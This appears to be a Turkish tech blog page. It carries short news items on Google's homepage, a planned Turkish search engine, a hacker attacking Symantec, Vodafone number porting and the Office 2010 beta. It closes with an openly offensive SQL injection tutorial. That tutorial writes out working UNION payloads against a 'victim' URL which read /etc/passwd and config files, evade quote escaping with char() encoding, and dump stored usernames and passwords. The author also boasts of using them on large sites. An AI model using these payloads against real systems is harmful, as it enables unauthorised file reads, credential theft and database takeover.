Demet Akalın - Olacak Olacak

Bugünlerde Google'da Bir Fark Var Ama Logosu Değil?

Başta yazı yok, yazılar imleç oynatılırsa "Fade in" efektiyle beliriyor
Google, ana sayfası üzerinde bir süredir değişiklik planları yapsa da büyük bir değişikliğe gitmemişti.

Bugün arama yapmak için Google ana sayfasını açan kullanıcılar, farklı bir sayfa ile karşılaştı. Hayır, değişen Google'ın logosu değildi, değişim ana sayfada ilk başta yazıların çıkmamasıydı.

Site yüklendiğinde sadece logo, arama kısmı ve iki tuş yer alıyor. İmleç oynatılana kadar böyle kalan ana sayfada tıklamadan aranacak kelime girilerek arama başaltılabiliyor. İmleç oynatılırsa, diğer yazı ve bağlantılar yavaşça beliriyor.

Google bu değişikliğin amacını minimalist bir yaşlaşım olarak açıklıyor. Google ana sayfasının arama olduğunu, diğer seçenekleri görmek isteyenlerin imleci oynatarak bunları görebileceğini beliriyor.

Türk Arama Motoru 2010 Yılında !

Bilgi Teknolojileri ve İletişim Kurumu, yaptığı açıklamada yeni bir arama motoru kurulacağını açıkladı. Yeni Türk arama motoru, Google,Yahoo ve Bing gibi devlere rakip olmaya hazırlanıyor.

Bilgi Teknolojileri ve İletişim Kurumu Başkanı Tayfun Acarer yaptığı açıklamada çalışmaların devam ettiğini ve 2010 yılı içerisinde tamamlanmasının hedeflendiğini belirtti. Bu yerli arama motorunun yapılmasının sebebi, Türkiye'de yapılan aramaların, haberleşmenin yabancı ülkelere gidip geri gelmesinin oluşturduğu güvenlik açığının önüne geçmek.

Yabancı arama motorlarının Türkiye'nin ihtiyaçlarına cevap vermediğini, ülke hassasiyetlerine zaman zaman duyarsız kaldığını belirten Tayfun Acarer, popüler arama motorlarının yabancı kaynaklı olduğunu belirttikten sonra "İnternet yoluyla yapılan her türlü haberleşme yabancı ülkelere gidiyor, oradan geri geliyor. İşin bu açıdan bir güvenlik tarafı var" dedi.

Türkçe YouTube mu geliyor? 

70 milyon kişinin TC kimlik numarası eşleşmesi seviyesinde kullanılabileceği, bir mobil ağ sağlanmış olacak. Yahoo, Hotmail, Gmail gibi yabancı ve güvenli olmayan posta adresleri-ağları kullanılmamış olacak. İslam ülkeleri ile Türk cumhuriyetleri, Türkiye'nin posta altyapısını tercih edecektir. Böylece uluslararası büyük bir ağ ve internet haberleşme ortamı sağlanmış olacak." Dedi.

YouTube yasağıyla ilgili olarak da konuşan Acarer, internet sitesine erişimin 17 Ocak 2008'de Ankara 12'nci Sulh Ceza Mahkemesinin kararıyla 'Atatürk'le ilgili özel bir kanun' nedeniyle engellendiğini hatırlattı. "Engellemenin kaldırılması için YouTube yetkilileri ile pek çok görüşme yapıldı. Görüşmelerden 3'üne Ulaştırma Bakanı Binali Yıldırım da katıldı" diyen Acarer, görüşmelerin sonucunda ortaya Türkiye için yerelleştirilmiş, Türkçe bir YouTube'un düşünüldüğünü belirtti.
 

Anti-Virüs Devlerinin Belalısı Geri Döndü !

Unu'yu artık siz de tanyorsunuz. Bu yılın başlarında Romanyalı bir "seri hacker" ardı ardına büyük güvenlik firmaları hedef almış ve sitelerine saldırmıştı. Unu'nun saldırılarından Kaspersky, BitDeffender, F-Secure ve Symantec gibi devler nasibini almıştı. Ve aradan bir yıl geçmeden Unu geri döndü...

Unu son olarak Pangolin ve Sqlmap adı verilen ve özellikle hacker'lar ile güvenlik uzmanları tarafından kullanılan yazılımlar yardımıyla Symantec'in Japonya'daki sunucularına saldırdı. Unu bu saldırıcı sonucunda güvenlik devinin sunucusundaki tüm dosyalara ve veri tabanına erişebildiğini açıkladı.

Symantec yetkilileri ise saldırıyı ve meydana gelen güvenlik açığını doğruladılar ama konunun ne derece ciddi olduğuna dair henüz bir açıklama yapmadılar. Unu, saldırısının detaylarını ve ekran görüntülerini kendi blog'unda yayınladı (İngilizce). Symantec ise saldırıya uğrayan sunucunun erişimini geçici olarak durdurdu.

Vodafone Numara Taşımada Birinci ..

Türkiye'de 9 Kasım 2008'de başlayannumara taşıma özgürlüğü geçen hafta birinci yılını tamamladı. 3G sonrası yükselişini sürdüren Vodafone, Mobil Numara Taşınabilirliği'nde en çok tercih edilen operatör oldu.

GSM sektöründeki rekabetinartmasındaki en büyük etkenlerden biri olan "Mobil Numara Taşınabilirliği" uygulamasının başladığı günden bugüne kadar 8 milyondan fazla abone bu seçenekten yararlandı.

Vodafone, hizmet kalitesini sürekli yükselten yatırımları ve abonelere sunduğu avantajlı hizmet paketleriyle, performansını hızla yükselterek numara taşımanın 1. yılında en çok numara taşınan operatör oldu.

                                         3G ve Diğer Hizmetler

Konuyla ilgili yazılı açıklama yapan Vodafone Türkiye Pazarlamadan Sorumlu Genel Müdür YardımcısıGökhan Öğüt, 9 Kasım 2008'de hayata geçirilen Mobil Numara Taşınabilirliği'nin GSM arenasında rekabet ortamının iyileştirilmesine yönelik önemli bir adım olduğunu vurguladı. Öğüt, uygulama sayesinde operatörler arasındaki rekabetin abonelere fayda sağladığını belirtti. Gökhan Öğüt, 3G ve diğer kaliteli iletişim hizmetlerini tüketiciye sunanVodafone'un avantajlı tarifelerinin yanı sıra tüketicinin kalbine ve zihnine hitap eden yeni reklam kampanyalarının da numara taşıma sürecini olumlu etkilediğini kaydetti.

Numarasını Vodafone'a taşıyan abonelerin son derece memnun olduğunu aktaran Öğüt şöyle devam etti: "Numaraları değişmeden Vodafone'a taşınan yeni abonelerimiz yalnızca şebeke içinde değil, her yöne yapılan çağrılarda da sunduğumuz cazip ödeme seçeneklerinden yararlanıyorlar. Mobil Numara Taşınabilirliği uygulamasında ilk yıl sonuçlarına göre arasındaki sonuçlarına göre en çok numara taşınan operatör olduk. Vodafone olarak başarıyı yakaladığımız bu alanda, Türkiye'nin dört bir yanındaki tüm abonelerimize kaliteli hizmet sunmaktan büyük bir heyecan ve mutluluk duyuyoruz" dedi.

MS Office 2010 Beta Hazır İndirin !

Teknik ön izleme programının tamamlanmasıyla birlikte Microsoft Office 2010, kullanıcı kitlesiyle buluşmaya hazır. Yazılım devi, önümüzdeki sene piyasaya sürülecek olan Office 2010 yazılım setinin beta sürümünü halka açmış durumda.

MS Office ilk kez iki farklı mimaride geliştiriliyor: Ofis seti  hem 32- hem de 64-bit olarak kullanıma sunuluyor. Aşağıdaki indirme linkine tıkladıktan sonra Windows Live ID'niz ile oturum açtığınızda istediğiniz mimariyi seçip indirebiliyorsunuz. Yeni sürümün getirdiği yenilikler arasında daha derli toplu hale getirilmiş arabirim ve Windows 7 geliştirmeleri var. Ayrıca bu sürümde setteki tüm programlar Office 2007 ile girişi yapılanRibbon arabirimini kullanıyor.

Microsoft Office 2010'un halka açık beta sürümünün derleme numarası 14.0.4536.1000; dolayısıyla haftalar önce paylaşım ağlarına düşen sürümden daha güncel oluyor. İndirme bağlantısına tıklayıp siz de yeni nesil Office setini deneyebilirsiniz.

Office 2010 Beta; Windows XP SP3, Windows Vista SP1 (ve üzeri) ve Windows 7'de çalışmaktadır.

Download: MS Office 2010 Beta

MySQL sistemler için sql enjeksiyonu olası tehlikeler,teknikler. - 1

Genelde ülkemizde bir çok kişi MySQL ve MSSQL'un birbirinden farklı bir yapıya sahip olduğunu düşünürler.
Ancak sanılanın aksine MySQL MSSQL'a en yakın denebilecek bir yapıya sahiptir.Postgre ve Oracle ise tamamen değişik bir yapıya sahipler diyebiliriz.
Gelelim konumuza, MySQL'da yapısı itibariyle aynı anda birden çok sorgu çalıştıramıyoruz.Ancak belli prosedürler ve alt sorgular (sub query) yapabilmekteyiz.
Bu dökümanda size bir kaç püf nokta göstereceğim.En basitinden başlayalım,
SQL sorguları bildiğiniz üzere her zaman mantık kurallarına göre çalışır.UNION sorgularını bilirsiniz UNION kelime itibariyle birleşik demektir genelde güvenlik sitelerini ve maillistlerde UNION ile enjekte edilmiş sorgular görmekteyiz ancak MySQL üzerindeki bu enjeksiyonlarda MSSQL ve Access gibi tablo adı bilmeden bile bir çok şey yapabiliriz.
Örnek saldırılar;
Hedef sorgunun 4 kolona hitap ettiğini bulduk
http://kurban/muziklistesi.php?liste=-1/**/UNION/**/SELECT/**/0,1,2,3/* şeklinde adrese tarayıcımız ile ulaştık dikkat ettiyseniz FROM ve benzeri ifadeleri sorguya eklemedim.
Sayfaya ulaştık ve karşımıza 0 1 3 2 şeklinde karışık olarak veriler çıktı, ee ne var bunda? Bu şimdi bizim bir çok işimize yarayacak.
load_file fonksiyonu sayesinde sistemden önce dosya dahil etmeyi gösterelim.
Kolonu rasgele yazıyorum direk 2. kolon diye düşünmeyin
http://kurban/muziklistesi.php?liste=-1/**/UNION/**/SELECT/**/0,load_file('/etc/passwd'),2,3/*
adresine tekrar tarayıcımızdan ulaşıyoruz.
Karşımıza o meşhur /etc/passwd dosyası ve içeriği çıktı.

root:x:0:0:root:/root:/bin/tcsh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh .. devamı

şeklinde , peki bu nasıl gelişebilir bazı hostlarda magic_quotes_gpc değeri aktif (on) durumda ise veya sorgular bi şekilde ' " gibi karakterleri escape edilip \' halini alıyor nasıl '/etc/passwd' yazıcaz edicez.
Basit char fonksiyonu ile bu dosyalara ulaşabiliriz.
'/etc/passwd' bu şekilde yazıcaz char(47,101,116,99,47,112,97,115,115,119,100)
dolayısıyla sorgumuz http://kurban/muziklistesi.php?liste=-1/**/UNION/**/SELECT/**/0,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),2,3/* şeklini alacak.
Peki bu daha nasıl gelişebilir.Bu yöntem ile sunucu tabanlı dosyalarıda okuyabiliriz gene iznimiz çerçevesinde, dolayısıyla kullanıcının eğer hata mesajı ile bulunduğu dizini alabildiysek config.php gibi dosyaları açıp okuyabiliriz.Bu şekilde bir çok büyük sitede bulduğum SQL enjektesi ile kendilerinin scriptlerini çekmiştim :).Hatta bu config dosyalarının içlerindeki db şifreleri ile sunucuda klasik phpmyadmin klasörüne erişip MySQL hesabına bağlanıp veritabanına erişim sağlayabiliriz.
Not: Şuana kadar olan bütün çalışmaları ve örneklemeleri *nix tabanlı sistemlere göre anlattım aklınız karışmasın.
Peki diyelim UNION sorgu tek kolona eşit geldi ne yapabilirim ben 4 5 kolon bilgisi çekicem, nasıl yapabilirim?..
Basit concat fonksiyonu ile birden çok değeri birleştirebiliriz.
Örnek sorgu: http://kurban/muziklistesi.php?liste=-1/**/UNION/**/SELECT/**/concat('Üye adı:',char(32),username,'Şifre:',char(32),password)/**/from/**/mymembers/*
Bu sorgu sonucu

Üye adı: osman Şifre: o1s2m3a4n5

gibi bir veri dönecek size, tabiki gene char fonksiyonu kullanabilirsiniz.
Ayrıca MySQL için genel tablo adları:

mysql.user
mysql.host
mysql.db

Gene aynı şekilde MySQL kriptolanmış kullanıcı şifrelerini öğrenme,dosyalara veri çıkarma ve bunlara erişme ile ilgili bir dökümanda ilerde yazıcam bugünlük bu kadar,